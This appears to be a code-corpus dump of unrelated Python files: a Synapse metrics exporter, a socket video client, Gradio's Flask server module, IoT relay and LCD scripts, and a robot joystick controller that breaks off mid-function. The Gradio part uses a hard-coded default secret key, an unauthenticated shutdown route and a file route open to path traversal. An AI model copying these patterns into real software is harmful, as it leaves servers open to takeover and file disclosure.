# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This code is based off `prometheus_client/exposition.py` from version 0.7.1.
Due to the renaming of metrics in prometheus_client 0.4.0, this customised
vendoring of the code will emit both the old versions that Synapse dashboards
expect, and the newer "best practice" version of the up-to-date official client.
"""
import math
import threading
from collections import namedtuple
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.parse import parse_qs, urlparse
from prometheus_client import REGISTRY
from twisted.web.resource import Resource
from synapse.util import caches
try:
from prometheus_client.samples import Sample
except ImportError:
Sample = namedtuple( # type: ignore[no-redef] # noqa
"Sample", ["name", "labels", "value", "timestamp", "exemplar"]
)
CONTENT_TYPE_LATEST = str("text/plain; version=0.0.4; charset=utf-8")
INF = float("inf")
MINUS_INF = float("-inf")
def floatToGoString(d):
d = float(d)
if d == INF:
return "+Inf"
elif d == MINUS_INF:
return "-Inf"
elif math.isnan(d):
return "NaN"
else:
s = repr(d)
dot = s.find(".")
# Go switches to exponents sooner than Python.
# We only need to care about positive values for le/quantile.
if d > 0 and dot > 6:
mantissa = "{0}.{1}{2}".format(s[0], s[1:dot], s[dot + 1 :]).rstrip("0.")
return "{0}e+0{1}".format(mantissa, dot - 1)
return s
def sample_line(line, name):
if line.labels:
labelstr = "{{{0}}}".format(
",".join(
[
'{0}="{1}"'.format(
k,
v.replace("\\", r"\\").replace("\n", r"\n").replace('"', r"\""),
)
for k, v in sorted(line.labels.items())
]
)
)
else:
labelstr = ""
timestamp = ""
if line.timestamp is not None:
# Convert to milliseconds.
timestamp = " {0:d}".format(int(float(line.timestamp) * 1000))
return "{0}{1} {2}{3}\n".format(
name, labelstr, floatToGoString(line.value), timestamp
)
def nameify_sample(sample):
"""
If we get a prometheus_client<0.4.0 sample as a tuple, transform it into a
namedtuple which has the names we expect.
"""
if not isinstance(sample, Sample):
sample = Sample(*sample, None, None)
return sample
def generate_latest(registry, emit_help=False):
# Trigger the cache metrics to be rescraped, which updates the common
# metrics but do not produce metrics themselves
for collector in caches.collectors_by_name.values():
collector.collect()
output = []
for metric in registry.collect():
if not metric.samples:
# No samples, don't bother.
continue
mname = metric.name
mnewname = metric.name
mtype = metric.type
# OpenMetrics -> Prometheus
if mtype == "counter":
mnewname = mnewname + "_total"
elif mtype == "info":
mtype = "gauge"
mnewname = mnewname + "_info"
elif mtype == "stateset":
mtype = "gauge"
elif mtype == "gaugehistogram":
mtype = "histogram"
elif mtype == "unknown":
mtype = "untyped"
# Output in the old format for compatibility.
if emit_help:
output.append(
"# HELP {0} {1}\n".format(
mname,
metric.documentation.replace("\\", r"\\").replace("\n", r"\n"),
)
)
output.append("# TYPE {0} {1}\n".format(mname, mtype))
for sample in map(nameify_sample, metric.samples):
# Get rid of the OpenMetrics specific samples
for suffix in ["_created", "_gsum", "_gcount"]:
if sample.name.endswith(suffix):
break
else:
newname = sample.name.replace(mnewname, mname)
if ":" in newname and newname.endswith("_total"):
newname = newname[: -len("_total")]
output.append(sample_line(sample, newname))
# Get rid of the weird colon things while we're at it
if mtype == "counter":
mnewname = mnewname.replace(":total", "")
mnewname = mnewname.replace(":", "_")
if mname == mnewname:
continue
# Also output in the new format, if it's different.
if emit_help:
output.append(
"# HELP {0} {1}\n".format(
mnewname,
metric.documentation.replace("\\", r"\\").replace("\n", r"\n"),
)
)
output.append("# TYPE {0} {1}\n".format(mnewname, mtype))
for sample in map(nameify_sample, metric.samples):
# Get rid of the OpenMetrics specific samples
for suffix in ["_created", "_gsum", "_gcount"]:
if sample.name.endswith(suffix):
break
else:
output.append(
sample_line(
sample, sample.name.replace(":total", "").replace(":", "_")
)
)
return "".join(output).encode("utf-8")
class MetricsHandler(BaseHTTPRequestHandler):
"""HTTP handler that gives metrics from ``REGISTRY``."""
registry = REGISTRY
def do_GET(self):
registry = self.registry
params = parse_qs(urlparse(self.path).query)
if "help" in params:
emit_help = True
else:
emit_help = False
try:
output = generate_latest(registry, emit_help=emit_help)
except Exception:
self.send_error(500, "error generating metric output")
raise
self.send_response(200)
self.send_header("Content-Type", CONTENT_TYPE_LATEST)
self.end_headers()
self.wfile.write(output)
def log_message(self, format, *args):
"""Log nothing."""
@classmethod
def factory(cls, registry):
"""Returns a dynamic MetricsHandler class tied
to the passed registry.
"""
# This implementation relies on MetricsHandler.registry
# (defined above and defaulted to REGISTRY).
# As we have unicode_literals, we need to create a str()
# object for type().
cls_name = str(cls.__name__)
MyMetricsHandler = type(cls_name, (cls, object), {"registry": registry})
return MyMetricsHandler
class _ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
"""Thread per request HTTP server."""
# Make worker threads "fire and forget". Beginning with Python 3.7 this
# prevents a memory leak because ``ThreadingMixIn`` starts to gather all
# non-daemon threads in a list in order to join on them at server close.
# Enabling daemon threads virtually makes ``_ThreadingSimpleServer`` the
# same as Python 3.7's ``ThreadingHTTPServer``.
daemon_threads = True
def start_http_server(port, addr="", registry=REGISTRY):
"""Starts an HTTP server for prometheus metrics as a daemon thread"""
CustomMetricsHandler = MetricsHandler.factory(registry)
httpd = _ThreadingSimpleServer((addr, port), CustomMetricsHandler)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
class MetricsResource(Resource):
"""
Twisted ``Resource`` that serves prometheus metrics.
"""
isLeaf = True
def __init__(self, registry=REGISTRY):
self.registry = registry
def render_GET(self, request):
request.setHeader(b"Content-Type", CONTENT_TYPE_LATEST.encode("ascii"))
return generate_latest(self.registry)
|
net_video_stream.py | import socket
import numpy as np
from threading import Thread
import time as t
class NetVideoStream:
def __init__(self, server_ip, server_port, width, height, channel):
self.ip = server_ip
self.port = server_port
self.width = width
self.height = height
self.channel = channel
self.image_size = width * height * channel
self.sock = None
self.connected = False
self.stopped = True
self.frame = False
self.thread = None
def connect(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.connected = False
print("[STREAM] connecting to server")
while not self.connected:
if self.stopped:
break
try:
self.sock.connect((self.ip, self.port))
self.connected = True
print("[STREAM] connected to server")
except Exception as e:
t.sleep(0.02)
continue
return self.connected
def disconnect(self):
try:
self.sock.shutdown(socket.SHUT_RDWR)
except Exception as e:
print("[STREAM] error on disconnect {}".format(e))
pass
self.sock.close()
self.connected = False
def read_data(self, length):
if self.stopped:
return False
msgparts = []
while length > 0:
try:
chunk = self.sock.recv(length)
except Exception as e:
return False
msgparts.append(chunk)
length -= len(chunk)
return b"".join(msgparts)
def read_image(self):
if self.stopped:
return False
length = self.image_size
msgparts = []
while length > 0:
try:
chunk = self.sock.recv(length)
if not chunk:
# print(
# "[STREAM] error on read data --> try to reconnect...")
return False
except Exception as e:
# print("[STREAM] error on recv data --> try to reconnect... {}".
# format(e))
return False
msgparts.append(chunk)
length -= len(chunk)
data = b"".join(msgparts)
return np.fromstring(data, np.uint8).reshape(self.height, self.width,
self.channel)
def start(self):
self.stopped = False
self.thread = Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while True:
if self.stopped:
return
image = self.read_image()
if image is False:
self.connect()
t.sleep(0.02)
continue
self.frame = image
t.sleep(0.002)
def read(self):
return self.frame
def stop(self):
self.stopped = True
return self
def is_connected(self):
return self.connected
def is_running(self):
return not self.stopped
def is_thread_alive(self):
return self.thread.is_alive()
|
networking.py | """
Defines helper methods useful for setting up ports, launching servers, and handling `ngrok`
"""
import os
import socket
import threading
from flask import Flask, request, session, jsonify, abort, send_file, render_template, redirect
from flask_cachebuster import CacheBuster
from flask_login import LoginManager, login_user, current_user, login_required
from flask_cors import CORS
import threading
import pkg_resources
import datetime
import time
import json
import urllib.request
from shutil import copyfile
import requests
import sys
import csv
import logging
from gradio.tunneling import create_tunnel
from gradio import encryptor
from gradio import queue
from functools import wraps
import io
import inspect
import traceback
INITIAL_PORT_VALUE = int(os.getenv(
'GRADIO_SERVER_PORT', "7860")) # The http server will try to open on port 7860. If not available, 7861, 7862, etc.
TRY_NUM_PORTS = int(os.getenv(
'GRADIO_NUM_PORTS', "100")) # Number of ports to try before giving up and throwing an exception.
LOCALHOST_NAME = os.getenv(
'GRADIO_SERVER_NAME', "127.0.0.1")
GRADIO_API_SERVER = "https://api.gradio.app/v1/tunnel-request"
GRADIO_FEATURE_ANALYTICS_URL = "https://api.gradio.app/gradio-feature-analytics/"
STATIC_TEMPLATE_LIB = pkg_resources.resource_filename("gradio", "templates/")
STATIC_PATH_LIB = pkg_resources.resource_filename("gradio", "templates/frontend/static")
VERSION_FILE = pkg_resources.resource_filename("gradio", "version.txt")
with open(VERSION_FILE) as version_file:
GRADIO_STATIC_ROOT = "https://gradio.s3-us-west-2.amazonaws.com/" + \
version_file.read().strip() + "/static/"
app = Flask(__name__,
template_folder=STATIC_TEMPLATE_LIB,
static_folder="",
static_url_path="/none/")
app.url_map.strict_slashes = False
CORS(app)
cache_buster = CacheBuster(
config={'extensions': ['.js', '.css'], 'hash_size': 5})
cache_buster.init_app(app)
app.secret_key = os.getenv("GRADIO_KEY", "secret")
login_manager = LoginManager()
login_manager.login_view = 'login'
login_manager.init_app(app)
# Hide Flask default message
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
class User:
def __init__(self, id):
self.is_authenticated = True
self.is_active = True
self.is_anonymous = False
self.id = id
def get_id(self):
return self.id
@login_manager.user_loader
def load_user(_id):
return User(_id)
def login_check(func):
@wraps(func)
def wrapper(*args, **kwargs):
if app.auth:
@login_required
def func2(*args, **kwargs):
return func(*args, **kwargs)
return func2(*args, **kwargs)
else:
return func(*args, **kwargs)
return wrapper
def get_local_ip_address():
try:
ip_address = requests.get('https://api.ipify.org', timeout=3).text
except (requests.ConnectionError, requests.exceptions.ReadTimeout):
ip_address = "No internet connection"
return ip_address
IP_ADDRESS = get_local_ip_address()
def get_first_available_port(initial, final):
"""
Gets the first open port in a specified range of port numbers
:param initial: the initial value in the range of port numbers
:param final: final (exclusive) value in the range of port numbers, should be greater than `initial`
:return:
"""
for port in range(initial, final):
try:
s = socket.socket() # create a socket object
s.bind((LOCALHOST_NAME, port)) # Bind to the port
s.close()
return port
except OSError:
pass
raise OSError(
"All ports from {} to {} are in use. Please close a port.".format(
initial, final
)
)
@app.route("/", methods=["GET"])
@login_check
def main():
session["state"] = None
return render_template("frontend/index.html", config=app.interface.config)
@app.route("/static/<path:path>", methods=["GET"])
def static_resource(path):
if app.interface.share:
return redirect(GRADIO_STATIC_ROOT + path)
else:
return send_file(os.path.join(STATIC_PATH_LIB, path))
# TODO(@aliabid94): this throws a 500 error if app.auth is None (should probalbly just redirect to '/')
@app.route('/login', methods=["GET", "POST"])
def login():
if request.method == "GET":
config = get_config()
return render_template("frontend/index.html", config=config)
elif request.method == "POST":
username = request.form.get("username")
password = request.form.get("password")
if ((not callable(app.auth) and username in app.auth and app.auth[username] == password)
or (callable(app.auth) and app.auth.__call__(username, password))):
login_user(User(username))
return redirect("/")
else:
return abort(401)
@app.route("/config/", methods=["GET"])
def get_config():
if app.interface.auth is None or current_user.is_authenticated:
return jsonify(app.interface.config)
else:
return {"auth_required": True, "auth_message": app.interface.auth_message}
@app.route("/enable_sharing/<path:path>", methods=["GET"])
@login_check
def enable_sharing(path):
if path == "None":
path = None
app.interface.config["share_url"] = path
return jsonify(success=True)
@app.route("/shutdown", methods=['GET'])
def shutdown():
shutdown_func = request.environ.get('werkzeug.server.shutdown')
if shutdown_func is None:
raise RuntimeError('Not running werkzeug')
shutdown_func()
return "Shutting down..."
@app.route("/api/predict/", methods=["POST"])
@login_check
def predict():
raw_input = request.json["data"]
# Capture any errors made and pipe to front end
if app.interface.show_error:
try:
prediction, durations = app.interface.process(raw_input)
except BaseException as error:
traceback.print_exc()
return jsonify({"error": str(error)}), 500
else:
prediction, durations = app.interface.process(raw_input)
avg_durations = []
for i, duration in enumerate(durations):
app.interface.predict_durations[i][0] += duration
app.interface.predict_durations[i][1] += 1
avg_durations.append(app.interface.predict_durations[i][0]
/ app.interface.predict_durations[i][1])
app.interface.config["avg_durations"] = avg_durations
output = {"data": prediction, "durations": durations, "avg_durations": avg_durations}
if app.interface.allow_flagging == "auto":
try:
flag_index = flag_data(raw_input, prediction,
flag_option=(None if app.interface.flagging_options is None else ""),
username=current_user.id if current_user.is_authenticated else None)
output["flag_index"] = flag_index
except Exception as e:
print(str(e))
pass
return jsonify(output)
def get_types(cls_set, component):
docset = []
types = []
if component == "input":
for cls in cls_set:
doc = inspect.getdoc(cls.preprocess)
doc_lines = doc.split("\n")
docset.append(doc_lines[1].split(":")[-1])
types.append(doc_lines[1].split(")")[0].split("(")[-1])
else:
for cls in cls_set:
doc = inspect.getdoc(cls.postprocess)
doc_lines = doc.split("\n")
docset.append(doc_lines[-1].split(":")[-1])
types.append(doc_lines[-1].split(")")[0].split("(")[-1])
return docset, types
@app.route("/api/", methods=["GET"])
def api_docs():
inputs = [type(inp) for inp in app.interface.input_components]
outputs = [type(out) for out in app.interface.output_components]
input_types_doc, input_types = get_types(inputs, "input")
output_types_doc, output_types = get_types(outputs, "output")
input_names = [type(inp).__name__ for inp in app.interface.input_components]
output_names = [type(out).__name__ for out in app.interface.output_components]
sample_inputs = [inp.generate_sample() for inp in app.interface.input_components]
docs = {
"inputs": input_names,
"outputs": output_names,
"len_inputs": len(inputs),
"len_outputs": len(outputs),
"inputs_lower": [name.lower() for name in input_names],
"outputs_lower": [name.lower() for name in output_names],
"input_types": input_types,
"output_types": output_types,
"input_types_doc": input_types_doc,
"output_types_doc": output_types_doc,
"sample_inputs": sample_inputs
}
return render_template("api_docs.html", **docs)
def log_feature_analytics(feature):
if app.interface.analytics_enabled:
try:
requests.post(GRADIO_FEATURE_ANALYTICS_URL,
data={
'ip_address': IP_ADDRESS,
'feature': feature}, timeout=3)
except (requests.ConnectionError, requests.exceptions.ReadTimeout):
pass # do not push analytics if no network
def flag_data(input_data, output_data, flag_option=None, flag_index=None, username=None, flag_path=None):
if flag_path is None:
flag_path = os.path.join(app.cwd, app.interface.flagging_dir)
log_fp = "{}/log.csv".format(flag_path)
encryption_key = app.interface.encryption_key if app.interface.encrypt else None
is_new = not os.path.exists(log_fp)
if flag_index is None:
csv_data = []
for i, interface in enumerate(app.interface.input_components):
csv_data.append(interface.save_flagged(
flag_path, app.interface.config["input_components"][i]["label"], input_data[i], encryption_key))
for i, interface in enumerate(app.interface.output_components):
csv_data.append(interface.save_flagged(
flag_path, app.interface.config["output_components"][i]["label"], output_data[i], encryption_key) if output_data[i] is not None else "")
if flag_option is not None:
csv_data.append(flag_option)
if username is not None:
csv_data.append(username)
csv_data.append(str(datetime.datetime.now()))
if is_new:
headers = [interface["label"]
for interface in app.interface.config["input_components"]]
headers += [interface["label"]
for interface in app.interface.config["output_components"]]
if app.interface.flagging_options is not None:
headers.append("flag")
if username is not None:
headers.append("username")
headers.append("timestamp")
def replace_flag_at_index(file_content):
file_content = io.StringIO(file_content)
content = list(csv.reader(file_content))
header = content[0]
flag_col_index = header.index("flag")
content[flag_index][flag_col_index] = flag_option
output = io.StringIO()
writer = csv.writer(output)
writer.writerows(content)
return output.getvalue()
if app.interface.encrypt:
output = io.StringIO()
if not is_new:
with open(log_fp, "rb") as csvfile:
encrypted_csv = csvfile.read()
decrypted_csv = encryptor.decrypt(
app.interface.encryption_key, encrypted_csv)
file_content = decrypted_csv.decode()
if flag_index is not None:
file_content = replace_flag_at_index(file_content)
output.write(file_content)
writer = csv.writer(output)
if flag_index is None:
if is_new:
writer.writerow(headers)
writer.writerow(csv_data)
with open(log_fp, "wb") as csvfile:
csvfile.write(encryptor.encrypt(
app.interface.encryption_key, output.getvalue().encode()))
else:
if flag_index is None:
with open(log_fp, "a", newline="") as csvfile:
writer = csv.writer(csvfile)
if is_new:
writer.writerow(headers)
writer.writerow(csv_data)
else:
with open(log_fp) as csvfile:
file_content = csvfile.read()
file_content = replace_flag_at_index(file_content)
with open(log_fp, "w", newline="") as csvfile: # newline parameter needed for Windows
csvfile.write(file_content)
with open(log_fp, "r") as csvfile:
line_count = len([None for row in csv.reader(csvfile)]) - 1
return line_count
@app.route("/api/flag/", methods=["POST"])
@login_check
def flag():
log_feature_analytics('flag')
data = request.json['data']
flag_data(data['input_data'], data['output_data'], data.get("flag_option"), data.get("flag_index"),
current_user.id if current_user.is_authenticated else None)
return jsonify(success=True)
@app.route("/api/interpret/", methods=["POST"])
@login_check
def interpret():
log_feature_analytics('interpret')
raw_input = request.json["data"]
interpretation_scores, alternative_outputs = app.interface.interpret(
raw_input)
return jsonify({
"interpretation_scores": interpretation_scores,
"alternative_outputs": alternative_outputs
})
@app.route("/file/<path:path>", methods=["GET"])
@login_check
def file(path):
if app.interface.encrypt and isinstance(app.interface.examples, str) and path.startswith(app.interface.examples):
with open(os.path.join(app.cwd, path), "rb") as encrypted_file:
encrypted_data = encrypted_file.read()
file_data = encryptor.decrypt(
app.interface.encryption_key, encrypted_data)
return send_file(io.BytesIO(file_data), attachment_filename=os.path.basename(path))
else:
return send_file(os.path.join(app.cwd, path))
@app.route("/api/queue/push/", methods=["POST"])
@login_check
def queue_push():
data = request.json["data"]
action = request.json["action"]
job_hash, queue_position = queue.push({"data": data}, action)
return {"hash": job_hash, "queue_position": queue_position}
@app.route("/api/queue/status/", methods=["POST"])
@login_check
def queue_status():
hash = request.json['hash']
status, data = queue.get_status(hash)
return {"status": status, "data": data}
def queue_thread(path_to_local_server, test_mode=False):
while True:
try:
next_job = queue.pop()
if next_job is not None:
_, hash, input_data, task_type = next_job
queue.start_job(hash)
response = requests.post(
path_to_local_server + "/api/" + task_type + "/", json=input_data)
if response.status_code == 200:
queue.pass_job(hash, response.json())
else:
queue.fail_job(hash, response.text)
else:
time.sleep(1)
except Exception as e:
time.sleep(1)
pass
if test_mode:
break
def start_server(interface, server_name, server_port=None, auth=None, ssl=None):
if server_port is None:
server_port = INITIAL_PORT_VALUE
port = get_first_available_port(
server_port, server_port + TRY_NUM_PORTS
)
path_to_local_server = "http://{}:{}/".format(server_name, port)
if auth is not None:
if not callable(auth):
app.auth = {account[0]: account[1] for account in auth}
else:
app.auth = auth
else:
app.auth = None
app.interface = interface
app.cwd = os.getcwd()
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
if app.interface.enable_queue:
if auth is not None or app.interface.encrypt:
raise ValueError("Cannot queue with encryption or authentication enabled.")
queue.init()
app.queue_thread = threading.Thread(target=queue_thread, args=(path_to_local_server,))
app.queue_thread.start()
if interface.save_to is not None:
interface.save_to["port"] = port
app_kwargs = {"port": port, "host": server_name}
if ssl:
app_kwargs["ssl_context"] = ssl
thread = threading.Thread(target=app.run,
kwargs=app_kwargs,
daemon=True)
thread.start()
return port, path_to_local_server, app, thread
def get_state():
return session.get("state")
def set_state(value):
session["state"] = value
def close_server(process):
process.terminate()
process.join()
def url_request(url):
try:
req = urllib.request.Request(
url=url, headers={"content-type": "application/json"}
)
res = urllib.request.urlopen(req, timeout=10)
return res
except Exception as e:
raise RuntimeError(str(e))
def setup_tunnel(local_server_port, endpoint):
response = url_request(
endpoint + '/v1/tunnel-request' if endpoint is not None else GRADIO_API_SERVER)
if response and response.code == 200:
try:
payload = json.loads(response.read().decode("utf-8"))[0]
return create_tunnel(payload, LOCALHOST_NAME, local_server_port)
except Exception as e:
raise RuntimeError(str(e))
def url_ok(url):
try:
for _ in range(5):
time.sleep(.500)
r = requests.head(url, timeout=3)
if r.status_code in (200, 401, 302): # 401 or 302 if auth is set
return True
except (ConnectionError, requests.exceptions.ConnectionError):
return False
|
relay.py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# The class for a relay (Grove - Relay)
import threading
import time
from cisco_deviot.thing import Action, Property, PropertyType
from cisco_grovepi.sensor import Sensor
class Relay(Sensor):
ON = 1
OFF = 0
def __init__(self, tid, name, pin):
Sensor.__init__(self, tid, name, pin)
self.add_action(Action("turn_on"))
self.add_action(Action("turn_off"))
self.add_action(Action("flash").
add_parameter(Property(name="duration", type=PropertyType.INT, value=10, range=[10, 100])).
add_parameter(Property(name="interval", type=PropertyType.INT, value=1, range=[1, 10])))
self.working_thread = None
def turn_on(self):
Sensor.digital_write(self, Relay.ON)
def turn_off(self):
Sensor.digital_write(self, Relay.OFF)
def flash(self, duration, interval):
if self.working_thread is None:
self.working_thread = threading.Thread(target=Relay.__working_function, args=(self, duration, interval))
self.working_thread.daemon = True
self.working_thread.start()
def __working_function(self, duration, interval):
while duration > 0:
self.turn_on()
time.sleep(interval)
duration -= interval
self.turn_off()
time.sleep(interval)
duration -= interval
self.working_thread = None
|
change_gif.py | # MIT License
# Copyright (c) 2014 Adafruit Industries
# Author: Tony DiCola
# Improved by the yongdol503
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import time
import random
import sys
import os.path
import threading
import multiprocessing as mp
from queue import Queue #쓰레드간 통신에 사용할 큐, 프로세스간 큐는 mp에 구현되어 있음
import ST7735 as TFT
import Adafruit_GPIO as GPIO
import Adafruit_GPIO.SPI as SPI
from PIL import Image, ImageSequence
def img_prepare(lcd_size=[128,128]): #이미지처리 함수, 빠른 전환을 위해 미리 처리 권장
global imgl
data=[]
for img in imgl:
img_path = os.path.abspath(os.path.join(os.path.dirname(__file__),'images',img))
eye = Image.open(img_path)
eye_list=[]
for frame in ImageSequence.Iterator(eye):
background = Image.new("RGB", lcd_size, "white")
background.paste(frame.resize(lcd_size, resample=Image.LANCZOS), [0,0])
eye_list.append(background)
data.append([img,len(eye_list),eye_list])
return data
def recive(sup,q): #메인 프로세스에서 보낸 데이터를 수신하는 쓰레드 함수
while True:
n=sup.recv()
q.put(n)
print('recive')
barrier2.wait()
def lcd(device,sup): #각각 lcd를 제어할 프로세스
data=img_prepare()
device.begin()
q=Queue()
observer=threading.Thread(target=recive,args=(sup,q))
observer.start() #메인에서 전송될 데이터를 관찰하고 전달할 쓰레드, 실시간을 위해 사용
n=0
while True:
if not q.empty():
print('changing img!')
n=q.get()
print("displayed <%s>"%data[n][0])
for i in range(0,data[n][1],2): #gif 전환속도를 올리고자 2step씩 건너뜀
barrier1.wait()
time.sleep(1/45)
device.display(data[n][2][i])
time.sleep(2)
if __name__ == "__main__":
try:
imgl=['eyes_v2_skyblue.gif','eyes_v2_light_brown.gif', 'eyes_v2_brown.gif', 'eyes_v2_indigo.gif', 'eyes_v2.gif', 'eyes_v2_love.gif', 'eyes_v2_blue.gif']
L_eye=TFT.ST7735(rst=24,dc=25,x_offset=2, y_offset=3, rotate=180,
spi=SPI.SpiDev(port=0,device=0,max_speed_hz=64*1000000))
R_eye=TFT.ST7735(rst=6 ,dc=12,x_offset=2, y_offset=3, rotate=180,
spi=SPI.SpiDev(port=0,device=1,max_speed_hz=64*1000000))
#process간 통신을 위한 파이프
Lpup,Lsup=mp.Pipe()
Rpup,Rsup=mp.Pipe()
barrier1=mp.Barrier(2, timeout=2)
barrier2=mp.Barrier(3, timeout=2)
left=mp.Process(target=lcd, args=(L_eye,Lsup))
right=mp.Process(target=lcd, args=(R_eye,Rsup))
left.start()
right.start()
#입력받아 정보를 전달할 메인 프로세스
print("change fucntion on")
while True:
for n,name in enumerate(imgl):
print(n,name)
try:
i=int(input())
except:
i=0
Lpup.send(i%7)
Rpup.send(i%7)
barrier2.wait()
except KeyboardInterrupt:
pass |
joy_multi_xbox360.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ##
# @brief [py example simple] motion basic test for doosan robot
# @author Kab Kyoum Kim (kabkyoum.kim@doosan.com)
import rospy
import os
import threading, time
import sys
from sensor_msgs.msg import Joy
sys.dont_write_bytecode = True
sys.path.append( os.path.abspath(os.path.join(os.path.dirname(__file__),"../../../../common/imp")) ) # get import pass : DSR_ROBOT.py
from DR_tcp_client import *
# for single robot
ROBOT_ID = "dsr01"
ROBOT_MODEL = "m1013"
import DR_init
DR_init.__dsr__id = ROBOT_ID
DR_init.__dsr__model = ROBOT_MODEL
from DSR_ROBOT import *
r = CDsrRobot(ROBOT_ID, ROBOT_MODEL)
m_stop_watch_time = 30 #sec
m_joyAnalogFlag = False
m_xyCompareFlag = False
m_joyButtonFlag = False
m_joyJogFlag = 0
m_joyJogVel = 0.0
g_sock = client_socket_open("192.168.137.2", 10004)
print("stop_watch server connect O.K!")
def shutdown():
print "shutdown time!"
print "shutdown time!"
print "shutdown time!"
pub_stop.publish(stop_mode=STOP_TYPE_QUICK)
return 0
def msgRobotState_cb(msg):
msgRobotState_cb.count += 1
if (0==(msgRobotState_cb.count % 100)):
rospy.loginfo("________ ROBOT STATUS ________")
print(" robot_state : %d" % (msg.robot_state))
print(" robot_state_str : %s" % (msg.robot_state_str))
print(" current_posj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_posj[0],msg.current_posj[1],msg.current_posj[2],msg.current_posj[3],msg.current_posj[4],msg.current_posj[5]))
msgRobotState_cb.count = 0
def thread_subscriber():
rospy.Subscriber('/'+ROBOT_ID +ROBOT_MODEL+'/state', RobotState, msgRobotState_cb)
rospy.spin()
#rospy.spinner(2)
def thread_stop_watch():
print("thread_stop_watch running...")
while 1:
res, rx_data = client_socket_read(g_sock) #server로부터 수신 대기
print("XXXXXXXXXXXXXXXXXXXXX")
print("XXXXXXXXXXXXXXXXXXXXX")
print("XXXXXXXXXXXXXXXXXXXXX")
print("res={0}, rx_data ={1}".format(res, rx_data))
rev_str = str(rx_data).encode("utf-8")
if rev_str == "#TIMEOUT":
print("Time of game is over!!!!")
elif rev_str == "#STOP":
print("The game is stopped!!!!")
else:
print("unknown data!!!")
def joy_cb(msg):
global m_joyAnalogFlag
global m_xyCompareFlag
global m_joyButtonFlag
global m_joyJogFlag
global m_joyJogVel
m_joyJogVel = 60
targetPos = [0, 0, 90, 0, 90, 0]
hommingPos = [0, 0, 0, 0, 0, 0]
jog_target = [0, 0, 0, 0, 0, 0]
for i in range(0,8):
#print("msg.buttons[{}] = {}".format(i,msg.buttons[i]) )
print("msg.axes[{}] = {}".format(i,msg.axes[i]) )
print("\n")
####
# go home
if msg.buttons[7] == 1 and msg.buttons[6] == 1:
r.movej(targetPos, 50, 50)
#----- START stop_watch ---------------------------------
client_socket_write(g_sock, b'#START')
#--------------------------------------------------------
elif msg.buttons[8] == 1:
#----- STOP stop_watch ----------------------------------
client_socket_write(g_sock, b'#STOP')
#--------------------------------------------------------
r.movej(hommingPos, 50, 50)
if msg.axes[4] != 0 or msg.axes[0] != 0 or msg.axes[1] != 0:
m_joyAnalogFlag = True
else:
m_joyAnalogFlag = False
if msg.axes[1] != 0 or msg.axes[0] or 0:
if abs(msg.axes[1]) > abs(msg.axes[0]):
m_xyCompareFlag = False
else:
m_xyCompareFlag = True
if msg.axes[6] != 0 or msg.axes[7] != 0:
m_joyButtonFlag = True
else:
m_joyButtonFlag = False
if m_joyJogFlag == -1 and not m_joyAnalogFlag and m_joyButtonFlag:
print("1111111")
if msg.axes[6] == 1:
m_joyJogFlag = JOG_AXIS_TASK_Y
m_joyJogVel = -60
if msg.axes[6] == -1:
m_joyJogFlag = JOG_AXIS_TASK_Y
m_joyJogVel = 60
if msg.axes[7] == 1:
m_joyJogFlag = JOG_AXIS_TASK_X
m_joyJogVel = 60
if msg.axes[7] == -1:
m_joyJogFlag = JOG_AXIS_TASK_X
m_joyJogVel = -60
#r.jog(m_joyJogFlag, MOVE_REFERENCE_TOOL, m_joyJogVel)
r.jog_multi([1,1,0,0,0,0], MOVE_REFERENCE_BASE, m_joyJogVel)
#elif m_joyAnalogFlag and m_joyJogFlag == -1 and not m_joyButtonFlag:
elif m_joyAnalogFlag and not m_joyButtonFlag:
print("22222222")
if msg.axes[4] > 0:
#m_joyJogFlag = JOG_AXIS_TASK_Z
jog_target[2] = 1
if msg.axes[4] < 0:
#m_joyJogFlag = JOG_AXIS_TASK_Z
jog_target[2] = -1
m_xyCompareFlag = 0
if msg.axes[1] > 0 and m_xyCompareFlag == 0:
#m_joyJogFlag = JOG_AXIS_TASK_X
jog_target[0] = -1*msg.axes[1] #-1
if msg.axes[1] < 0 and m_xyCompareFlag == 0:
#m_joyJogFlag = JOG_AXIS_TASK_X
jog_target[0] = -1*msg.axes[1] #1
m_xyCompareFlag = 1
if msg.axes[0] > 0 and m_xyCompareFlag == 1:
#m_joyJogFlag = JOG_AXIS_TASK_Y
jog_target[1] = -1*msg.axes[0] #-1
if msg.axes[0] < 0 and m_xyCompareFlag == 1:
